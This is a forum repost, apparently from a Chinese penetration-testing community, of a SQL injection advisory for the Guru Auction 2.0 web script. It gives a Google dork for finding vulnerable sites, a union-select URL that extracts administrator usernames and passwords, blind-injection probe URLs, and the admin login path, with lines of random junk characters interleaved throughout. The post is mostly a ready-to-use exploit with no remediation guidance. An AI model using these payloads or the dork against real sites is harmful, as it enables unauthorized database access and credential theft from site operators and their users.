中国网络渗透测试联盟
标题:
Guru Auction 2.0多重sql注射
[打印本页]
作者:
admin
时间:
2012-12-31 09:24
标题:
Guru Auction 2.0多重sql注射
Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
& K G6 L) P$ {* k7 ]/ X) ]) K' O/ M
' y7 a' D: D. r) y- m* Z. z
作者 : v3n0m
1 M- ^7 W! o' c
应用 : Guru Auction 2.0
% }- Y4 X) Z. U; i1 G2 F
Price : $49
d( O4 ~ ]) I
Vendor :
http://www.guruscript.com/
* z5 W9 B4 E- |$ Y
Google Dork : inurl:subcat.php?cate_id=
# I1 j7 B' }# E3 s0 U9 A
' M0 H t- _7 ?* V9 d! d) \5 Y5 Y
SQLi p0c:
0 {* t- X3 _- @' I3 X* P6 S
~~~~~~~~~~
3 ?. B. y# M# R
http://domain.tld/
[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
' G1 M" w" U% y( W2 l
* S# b6 x$ [9 l8 L! X l/ g! {
" ?% y6 ]8 l% u" P' x% M( D
盲注 p0c:
, G- D0 ]9 Z* J& i
~~~~~~~~~~
% ?- B r! @# u* E+ \- y2 S
http://www.political-security.com
/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
n2 z8 V* }1 O6 n- n3 U: \
http://domain.tld/
[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
# B$ q0 [$ V5 n9 |* q3 p
& J! b/ P5 ?& k' M6 ^0 i
管理登录入口:
% m! H9 k9 V/ B/ a
~~~~~~~~~~
, z2 S6 ^( h$ x2 }$ \( m
http://domain.tld/
[path]/admin/
) |% ]5 Z& Y- K
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2